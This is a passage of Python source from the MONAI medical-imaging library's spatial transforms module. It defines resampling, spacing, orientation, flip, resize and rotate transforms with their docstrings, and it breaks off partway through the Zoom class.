from monai.data.utils import AFFINE_TOL, compute_shape_offset, reorient_spatial_axes, to_affine_nd, zoom_affine
from monai.networks.layers import AffineTransform, GaussianFilter, grid_pull
from monai.networks.utils import meshgrid_ij, normalize_transform
from monai.transforms.croppad.array import CenterSpatialCrop, Pad
from monai.transforms.transform import Randomizable, RandomizableTransform, ThreadUnsafe, Transform
from monai.transforms.utils import (
create_control_grid,
create_grid,
create_rotate,
create_scale,
create_shear,
create_translate,
map_spatial_axes,
)
from monai.transforms.utils_pytorch_numpy_unification import allclose, moveaxis
from monai.utils import (
GridSampleMode,
GridSamplePadMode,
InterpolateMode,
NumpyPadMode,
PytorchPadMode,
ensure_tuple,
ensure_tuple_rep,
ensure_tuple_size,
fall_back_tuple,
issequenceiterable,
optional_import,
pytorch_after,
)
from monai.utils.deprecate_utils import deprecated_arg
from monai.utils.enums import TransformBackends
from monai.utils.module import look_up_option
from monai.utils.type_conversion import convert_data_type, convert_to_dst_type
nib, has_nib = optional_import("nibabel")
__all__ = [
"SpatialResample",
"ResampleToMatch",
"Spacing",
"Orientation",
"Flip",
"GridDistortion",
"Resize",
"Rotate",
"Zoom",
"Rotate90",
"RandRotate90",
"RandRotate",
"RandFlip",
"RandGridDistortion",
"RandAxisFlip",
"RandZoom",
"AffineGrid",
"RandAffineGrid",
"RandDeformGrid",
"Resample",
"Affine",
"RandAffine",
"Rand2DElastic",
"Rand3DElastic",
]
RandRange = Optional[Union[Sequence[Union[Tuple[float, float], float]], float]]
class SpatialResample(Transform):
"""
Resample input image from the orientation/spacing defined by ``src_affine`` affine matrix into
the ones specified by ``dst_affine`` affine matrix.
Internally this transform computes the affine transform matrix from ``src_affine`` to ``dst_affine``,
by ``xform = linalg.solve(src_affine, dst_affine)``, and call ``monai.transforms.Affine`` with ``xform``.
"""
backend = [TransformBackends.TORCH]
def __init__(
self,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: DtypeLike = np.float64,
):
"""
Args:
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
If ``None``, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
"""
self.mode = mode
self.padding_mode = padding_mode
self.align_corners = align_corners
self.dtype = dtype
def __call__(
self,
img: NdarrayOrTensor,
src_affine: Optional[NdarrayOrTensor] = None,
dst_affine: Optional[NdarrayOrTensor] = None,
spatial_size: Optional[Union[Sequence[int], np.ndarray, int]] = None,
mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
align_corners: Optional[bool] = False,
dtype: DtypeLike = None,
) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
"""
Args:
img: input image to be resampled. It currently supports channel-first arrays with
at most three spatial dimensions.
src_affine: source affine matrix. Defaults to ``None``, which means the identity matrix.
the shape should be `(r+1, r+1)` where `r` is the spatial rank of ``img``.
dst_affine: destination affine matrix. Defaults to ``None``, which means the same as `src_affine`.
the shape should be `(r+1, r+1)` where `r` is the spatial rank of ``img``.
when `dst_affine` and `spatial_size` are None, the input will be returned without resampling,
but the data type will be `float32`.
spatial_size: output image spatial size.
if `spatial_size` and `self.spatial_size` are not defined,
the transform will compute a spatial size automatically containing the previous field of view.
if `spatial_size` is ``-1`` are the transform will use the corresponding input img size.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``self.dtype`` or
``np.float64`` (for best precision). If ``None``, use the data type of input data.
To be compatible with other modules, the output data type is always `float32`.
The spatial rank is determined by the smallest among ``img.ndim -1``, ``len(src_affine) - 1``, and ``3``.
When both ``monai.config.USE_COMPILED`` and ``align_corners`` are set to ``True``,
MONAI's resampling implementation will be used.
Set `dst_affine` and `spatial_size` to `None` to turn off the resampling step.
"""
if src_affine is None:
src_affine = np.eye(4, dtype=np.float64)
spatial_rank = min(len(img.shape) - 1, src_affine.shape[0] - 1, 3)
if (not isinstance(spatial_size, int) or spatial_size != -1) and spatial_size is not None:
spatial_rank = min(len(ensure_tuple(spatial_size)), 3) # infer spatial rank based on spatial_size
src_affine = to_affine_nd(spatial_rank, src_affine)
dst_affine = to_affine_nd(spatial_rank, dst_affine) if dst_affine is not None else src_affine
dst_affine, *_ = convert_to_dst_type(dst_affine, dst_affine, dtype=torch.float32)
in_spatial_size = np.asarray(img.shape[1 : spatial_rank + 1])
if isinstance(spatial_size, int) and (spatial_size == -1): # using the input spatial size
spatial_size = in_spatial_size
elif spatial_size is None and spatial_rank > 1: # auto spatial size
spatial_size, _ = compute_shape_offset(in_spatial_size, src_affine, dst_affine) # type: ignore
spatial_size = np.asarray(fall_back_tuple(ensure_tuple(spatial_size)[:spatial_rank], in_spatial_size))
if (
allclose(src_affine, dst_affine, atol=AFFINE_TOL)
and allclose(spatial_size, in_spatial_size)
or spatial_rank == 1
):
# no significant change, return original image
output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
return output_data, dst_affine
if has_nib and isinstance(img, np.ndarray):
spatial_ornt, dst_r = reorient_spatial_axes(img.shape[1 : spatial_rank + 1], src_affine, dst_affine)
if allclose(dst_r, dst_affine, atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
# simple reorientation achieves the desired affine
spatial_ornt[:, 0] += 1
spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
img_ = nib.orientations.apply_orientation(img, spatial_ornt)
output_data, *_ = convert_to_dst_type(img_, img, dtype=torch.float32)
return output_data, dst_affine
try:
src_affine, *_ = convert_to_dst_type(src_affine, dst_affine)
if isinstance(src_affine, np.ndarray):
xform = np.linalg.solve(src_affine, dst_affine)
else:
xform = (
torch.linalg.solve(src_affine, dst_affine)
if pytorch_after(1, 8, 0)
else torch.solve(dst_affine, src_affine).solution # type: ignore
)
except (np.linalg.LinAlgError, RuntimeError) as e:
raise ValueError(f"src affine is not invertible: {src_affine}") from e
xform = to_affine_nd(spatial_rank, xform)
# no resampling if it's identity transform
if allclose(xform, np.diag(np.ones(len(xform))), atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
return output_data, dst_affine
_dtype = dtype or self.dtype or img.dtype
in_spatial_size = in_spatial_size.tolist()
chns, additional_dims = img.shape[0], img.shape[spatial_rank + 1 :] # beyond three spatial dims
# resample
img_ = convert_data_type(img, torch.Tensor, dtype=_dtype)[0]
xform = convert_to_dst_type(xform, img_)[0]
align_corners = self.align_corners if align_corners is None else align_corners
mode = mode or self.mode
padding_mode = padding_mode or self.padding_mode
if additional_dims:
xform_shape = [-1] + in_spatial_size
img_ = img_.reshape(xform_shape)
if align_corners:
_t_r = torch.diag(torch.ones(len(xform), dtype=xform.dtype, device=xform.device)) # type: ignore
for idx, d_dst in enumerate(spatial_size[:spatial_rank]):
_t_r[idx, -1] = (max(d_dst, 2) - 1.0) / 2.0
xform = xform @ _t_r
if not USE_COMPILED:
_t_l = normalize_transform(
in_spatial_size, xform.device, xform.dtype, align_corners=True # type: ignore
)
xform = _t_l @ xform # type: ignore
affine_xform = Affine(
affine=xform, spatial_size=spatial_size, norm_coords=False, image_only=True, dtype=_dtype
)
output_data = affine_xform(img_, mode=mode, padding_mode=padding_mode)
else:
affine_xform = AffineTransform(
normalized=False,
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
reverse_indexing=True,
)
output_data = affine_xform(img_.unsqueeze(0), theta=xform, spatial_size=spatial_size).squeeze(0)
if additional_dims:
full_shape = (chns, *spatial_size, *additional_dims)
output_data = output_data.reshape(full_shape)
# output dtype float
output_data, *_ = convert_to_dst_type(output_data, img, dtype=torch.float32)
return output_data, dst_affine
class ResampleToMatch(SpatialResample):
"""Resample an image to match given meta data. The affine matrix will be aligned,
and the size of the output image will match."""
def __call__( # type: ignore
self,
img: NdarrayOrTensor,
src_meta: Optional[Dict] = None,
dst_meta: Optional[Dict] = None,
mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
align_corners: Optional[bool] = False,
dtype: DtypeLike = None,
):
if src_meta is None:
raise RuntimeError("`in_meta` is missing")
if dst_meta is None:
raise RuntimeError("`out_meta` is missing")
mode = mode or self.mode
padding_mode = padding_mode or self.padding_mode
align_corners = self.align_corners if align_corners is None else align_corners
dtype = dtype or self.dtype
src_affine = src_meta.get("affine")
dst_affine = dst_meta.get("affine")
img, updated_affine = super().__call__(
img=img,
src_affine=src_affine,
dst_affine=dst_affine,
spatial_size=dst_meta.get("spatial_shape"),
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
dtype=dtype,
)
dst_meta = deepcopy(dst_meta)
dst_meta["affine"] = updated_affine
return img, dst_meta
class Spacing(Transform):
"""
Resample input image into the specified `pixdim`.
"""
backend = SpatialResample.backend
def __init__(
self,
pixdim: Union[Sequence[float], float, np.ndarray],
diagonal: bool = False,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: DtypeLike = np.float64,
image_only: bool = False,
) -> None:
"""
Args:
pixdim: output voxel spacing. if providing a single number, will use it for the first dimension.
items of the pixdim sequence map to the spatial dimensions of input image, if length
of pixdim sequence is longer than image spatial dimensions, will ignore the longer part,
if shorter, will pad with `1.0`.
if the components of the `pixdim` are non-positive values, the transform will use the
corresponding components of the original pixdim, which is computed from the `affine`
matrix of input image.
diagonal: whether to resample the input to have a diagonal affine matrix.
If True, the input data is resampled to the following affine::
np.diag((pixdim_0, pixdim_1, ..., pixdim_n, 1))
This effectively resets the volume to the world coordinate system (RAS+ in nibabel).
The original orientation, rotation, shearing are not preserved.
If False, this transform preserves the axes orientation, orthogonal rotation and
translation components from the original affine. This option will not flip/swap axes
of the original data.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
image_only: return just the image or the image, the old affine and new affine. Default is `False`.
"""
self.pixdim = np.array(ensure_tuple(pixdim), dtype=np.float64)
self.diagonal = diagonal
self.image_only = image_only
self.sp_resample = SpatialResample(
mode=look_up_option(mode, GridSampleMode),
padding_mode=look_up_option(padding_mode, GridSamplePadMode),
align_corners=align_corners,
dtype=dtype,
)
def __call__(
self,
data_array: NdarrayOrTensor,
affine: Optional[NdarrayOrTensor] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: DtypeLike = None,
output_spatial_shape: Optional[Union[Sequence[int], np.ndarray, int]] = None,
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
"""
Args:
data_array: in shape (num_channels, H[, W, ...]).
affine (matrix): (N+1)x(N+1) original affine matrix for spatially ND `data_array`. Defaults to identity.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``self.dtype``.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
output_spatial_shape: specify the shape of the output data_array. This is typically useful for
the inverse of `Spacingd` where sometimes we could not compute the exact shape due to the quantization
error with the affine.
Raises:
ValueError: When ``data_array`` has no spatial dimensions.
ValueError: When ``pixdim`` is nonpositive.
Returns:
data_array (resampled into `self.pixdim`), original affine, current affine.
"""
sr = int(data_array.ndim - 1)
if sr <= 0:
raise ValueError("data_array must have at least one spatial dimension.")
if affine is None:
# default to identity
affine_np = affine = np.eye(sr + 1, dtype=np.float64)
affine_ = np.eye(sr + 1, dtype=np.float64)
else:
affine_np, *_ = convert_data_type(affine, np.ndarray)
affine_ = to_affine_nd(sr, affine_np)
out_d = self.pixdim[:sr]
if out_d.size < sr:
out_d = np.append(out_d, [1.0] * (sr - out_d.size))
# compute output affine, shape and offset
new_affine = zoom_affine(affine_, out_d, diagonal=self.diagonal)
output_shape, offset = compute_shape_offset(data_array.shape[1:], affine_, new_affine)
new_affine[:sr, -1] = offset[:sr]
output_data, new_affine = self.sp_resample(
data_array,
src_affine=affine,
dst_affine=new_affine,
spatial_size=list(output_shape) if output_spatial_shape is None else output_spatial_shape,
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
dtype=dtype,
)
new_affine = to_affine_nd(affine_np, new_affine)
new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
if self.image_only:
return output_data
return output_data, affine, new_affine
class Orientation(Transform):
"""
Change the input image's orientation into the specified based on `axcodes`.
"""
backend = [TransformBackends.NUMPY, TransformBackends.TORCH]
def __init__(
self,
axcodes: Optional[str] = None,
as_closest_canonical: bool = False,
labels: Optional[Sequence[Tuple[str, str]]] = tuple(zip("LPI", "RAS")),
image_only: bool = False,
) -> None:
"""
Args:
axcodes: N elements sequence for spatial ND input's orientation.
e.g. axcodes='RAS' represents 3D orientation:
(Left, Right), (Posterior, Anterior), (Inferior, Superior).
default orientation labels options are: 'L' and 'R' for the first dimension,
'P' and 'A' for the second, 'I' and 'S' for the third.
as_closest_canonical: if True, load the image as closest to canonical axis format.
labels: optional, None or sequence of (2,) sequences
(2,) sequences are labels for (beginning, end) of output axis.
Defaults to ``(('L', 'R'), ('P', 'A'), ('I', 'S'))``.
image_only: if True return only the image volume, otherwise return (image, affine, new_affine).
Raises:
ValueError: When ``axcodes=None`` and ``as_closest_canonical=True``. Incompatible values.
See Also: `nibabel.orientations.ornt2axcodes`.
"""
if axcodes is None and not as_closest_canonical:
raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
if axcodes is not None and as_closest_canonical:
warnings.warn("using as_closest_canonical=True, axcodes ignored.")
self.axcodes = axcodes
self.as_closest_canonical = as_closest_canonical
self.labels = labels
self.image_only = image_only
def __call__(
self, data_array: NdarrayOrTensor, affine: Optional[NdarrayOrTensor] = None
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
"""
original orientation of `data_array` is defined by `affine`.
Args:
data_array: in shape (num_channels, H[, W, ...]).
affine (matrix): (N+1)x(N+1) original affine matrix for spatially ND `data_array`. Defaults to identity.
Raises:
ValueError: When ``data_array`` has no spatial dimensions.
ValueError: When ``axcodes`` spatiality differs from ``data_array``.
Returns:
data_array [reoriented in `self.axcodes`] if `self.image_only`, else
(data_array [reoriented in `self.axcodes`], original axcodes, current axcodes).
"""
spatial_shape = data_array.shape[1:]
sr = len(spatial_shape)
if sr <= 0:
raise ValueError("data_array must have at least one spatial dimension.")
affine_: np.ndarray
if affine is None:
# default to identity
affine_np = affine = np.eye(sr + 1, dtype=np.float64)
affine_ = np.eye(sr + 1, dtype=np.float64)
else:
affine_np, *_ = convert_data_type(affine, np.ndarray)
affine_ = to_affine_nd(sr, affine_np)
src = nib.io_orientation(affine_)
if self.as_closest_canonical:
spatial_ornt = src
else:
if self.axcodes is None:
raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
if sr < len(self.axcodes):
warnings.warn(
f"axcodes ('{self.axcodes}') length is smaller than the number of input spatial dimensions D={sr}.\n"
f"{self.__class__.__name__}: input spatial shape is {spatial_shape}, num. channels is {data_array.shape[0]},"
"please make sure the input is in the channel-first format."
)
dst = nib.orientations.axcodes2ornt(self.axcodes[:sr], labels=self.labels)
if len(dst) < sr:
raise ValueError(
f"axcodes must match data_array spatially, got axcodes={len(self.axcodes)}D data_array={sr}D"
)
spatial_ornt = nib.orientations.ornt_transform(src, dst)
new_affine = affine_ @ nib.orientations.inv_ornt_aff(spatial_ornt, spatial_shape)
_is_tensor = isinstance(data_array, torch.Tensor)
spatial_ornt[:, 0] += 1 # skip channel dim
spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
axes = [ax for ax, flip in enumerate(spatial_ornt[:, 1]) if flip == -1]
if axes:
data_array = (
torch.flip(data_array, dims=axes) if _is_tensor else np.flip(data_array, axis=axes) # type: ignore
)
full_transpose = np.arange(len(data_array.shape))
full_transpose[: len(spatial_ornt)] = np.argsort(spatial_ornt[:, 0])
if not np.all(full_transpose == np.arange(len(data_array.shape))):
if _is_tensor:
data_array = data_array.permute(full_transpose.tolist()) # type: ignore
else:
data_array = data_array.transpose(full_transpose) # type: ignore
out, *_ = convert_to_dst_type(src=data_array, dst=data_array)
new_affine = to_affine_nd(affine_np, new_affine)
new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
if self.image_only:
return out
return out, affine, new_affine
class Flip(Transform):
"""
Reverses the order of elements along the given spatial axis. Preserves shape.
Uses ``np.flip`` in practice. See numpy.flip for additional details:
https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html.
Args:
spatial_axis: spatial axes along which to flip over. Default is None.
The default `axis=None` will flip over all of the axes of the input array.
If axis is negative it counts from the last to the first axis.
If axis is a tuple of ints, flipping is performed on all of the axes
specified in the tuple.
"""
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
def __init__(self, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
self.spatial_axis = spatial_axis
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
"""
if isinstance(img, np.ndarray):
return np.ascontiguousarray(np.flip(img, map_spatial_axes(img.ndim, self.spatial_axis)))
return torch.flip(img, map_spatial_axes(img.ndim, self.spatial_axis))
class Resize(Transform):
"""
Resize the input image to given spatial size (with scaling, not cropping/padding).
Implemented using :py:class:`torch.nn.functional.interpolate`.
Args:
spatial_size: expected shape of spatial dimensions after resize operation.
if some components of the `spatial_size` are non-positive values, the transform will use the
corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
to `(32, 64)` if the second spatial dimension size of img is `64`.
size_mode: should be "all" or "longest", if "all", will use `spatial_size` for all the spatial dims,
if "longest", rescale the image so that only the longest side is equal to specified `spatial_size`,
which must be an int number in this case, keeping the aspect ratio of the initial image, refer to:
https://albumentations.ai/docs/api_reference/augmentations/geometric/resize/
#albumentations.augmentations.geometric.resize.LongestMaxSize.
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``"area"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
"""
backend = [TransformBackends.TORCH]
def __init__(
self,
spatial_size: Union[Sequence[int], int],
size_mode: str = "all",
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
align_corners: Optional[bool] = None,
) -> None:
self.size_mode = look_up_option(size_mode, ["all", "longest"])
self.spatial_size = spatial_size
self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
self.align_corners = align_corners
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
align_corners: Optional[bool] = None,
) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]).
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
Raises:
ValueError: When ``self.spatial_size`` length is less than ``img`` spatial dimensions.
"""
img_, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float)
if self.size_mode == "all":
input_ndim = img_.ndim - 1 # spatial ndim
output_ndim = len(ensure_tuple(self.spatial_size))
if output_ndim > input_ndim:
input_shape = ensure_tuple_size(img_.shape, output_ndim + 1, 1)
img_ = img_.reshape(input_shape)
elif output_ndim < input_ndim:
raise ValueError(
"len(spatial_size) must be greater or equal to img spatial dimensions, "
f"got spatial_size={output_ndim} img={input_ndim}."
)
spatial_size_ = fall_back_tuple(self.spatial_size, img_.shape[1:])
else: # for the "longest" mode
img_size = img_.shape[1:]
if not isinstance(self.spatial_size, int):
raise ValueError("spatial_size must be an int number if size_mode is 'longest'.")
scale = self.spatial_size / max(img_size)
spatial_size_ = tuple(int(round(s * scale)) for s in img_size)
resized = torch.nn.functional.interpolate(
input=img_.unsqueeze(0),
size=spatial_size_,
mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
align_corners=self.align_corners if align_corners is None else align_corners,
)
out, *_ = convert_to_dst_type(resized.squeeze(0), img)
return out
class Rotate(Transform, ThreadUnsafe):
"""
Rotates an input image by given angle using :py:class:`monai.networks.layers.AffineTransform`.
Args:
angle: Rotation angle(s) in radians. should a float for 2D, three floats for 3D.
keep_size: If it is True, the output shape is kept the same as the input.
If it is False, the output shape is adapted so that the
input array is contained completely in the output. Default is True.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Defaults to False.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``np.float32``.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
"""
backend = [TransformBackends.TORCH]
def __init__(
self,
angle: Union[Sequence[float], float],
keep_size: bool = True,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: Union[DtypeLike, torch.dtype] = np.float32,
) -> None:
self.angle = angle
self.keep_size = keep_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.align_corners = align_corners
self.dtype = dtype
self._rotation_matrix: Optional[NdarrayOrTensor] = None
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: Union[DtypeLike, torch.dtype] = None,
) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: [chns, H, W] or [chns, H, W, D].
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``self.dtype``.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
Raises:
ValueError: When ``img`` spatially is not one of [2D, 3D].
"""
_dtype = dtype or self.dtype or img.dtype
img_t, *_ = convert_data_type(img, torch.Tensor, dtype=_dtype)
im_shape = np.asarray(img_t.shape[1:]) # spatial dimensions
input_ndim = len(im_shape)
if input_ndim not in (2, 3):
raise ValueError(f"Unsupported img dimension: {input_ndim}, available options are [2, 3].")
_angle = ensure_tuple_rep(self.angle, 1 if input_ndim == 2 else 3)
transform = create_rotate(input_ndim, _angle)
shift = create_translate(input_ndim, ((im_shape - 1) / 2).tolist())
if self.keep_size:
output_shape = im_shape
else:
corners = np.asarray(np.meshgrid(*[(0, dim) for dim in im_shape], indexing="ij")).reshape(
(len(im_shape), -1)
)
corners = transform[:-1, :-1] @ corners # type: ignore
output_shape = np.asarray(corners.ptp(axis=1) + 0.5, dtype=int)
shift_1 = create_translate(input_ndim, (-(output_shape - 1) / 2).tolist())
transform = shift @ transform @ shift_1
transform_t, *_ = convert_to_dst_type(transform, img_t)
xform = AffineTransform(
normalized=False,
mode=look_up_option(mode or self.mode, GridSampleMode),
padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
align_corners=self.align_corners if align_corners is None else align_corners,
reverse_indexing=True,
)
output: torch.Tensor = xform(img_t.unsqueeze(0), transform_t, spatial_size=output_shape).float().squeeze(0)
self._rotation_matrix = transform
out: NdarrayOrTensor
out, *_ = convert_to_dst_type(output, dst=img, dtype=output.dtype)
return out
def get_rotation_matrix(self) -> Optional[NdarrayOrTensor]:
"""
Get the most recently applied rotation matrix
This is not thread-safe.
"""
return self._rotation_matrix
class Zoom(Transform):
"""
Zooms an ND image using :py:class:`torch.nn.functional.interpolate`.
For details, please see https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html.
Different from :py:class:`monai.transforms.resize`, this transform takes scaling factors
as input, and provides an option of preserving the input spatial size.
Args:
zoom: The zoom factor along the spatial axes.
If a float, zoom is the same for each spatial axis.
If a sequence, zoom should contain one value for each spatial axis.
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``"area"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
One of the listed string values or a user supplied function. Defaults to ``"constant"``.
The mode to pad data after zooming.
See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
keep_size: Should keep original size (padding/slicing if needed), default is True.
kwargs: other arguments for the `np.pad` or `torch.pad` function.
note that `np.pad` treats channel dimension as the first dimension.
"""
backend = [TransformBackends.TORCH]
def __init__(
self,
zoom: Union[Sequence[float], float],
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
align_corners: Optional[bool] = None,
keep_size: bool = True,
**kwargs,
) -> None:
self.zoom = zoom
self.mode: InterpolateMode = InterpolateMode(mode)
self.padding_mode = padding_mode
self.align_corners = align_corners
self.keep_size = keep_size
self.kwargs = kwargs
def __call__(
self,
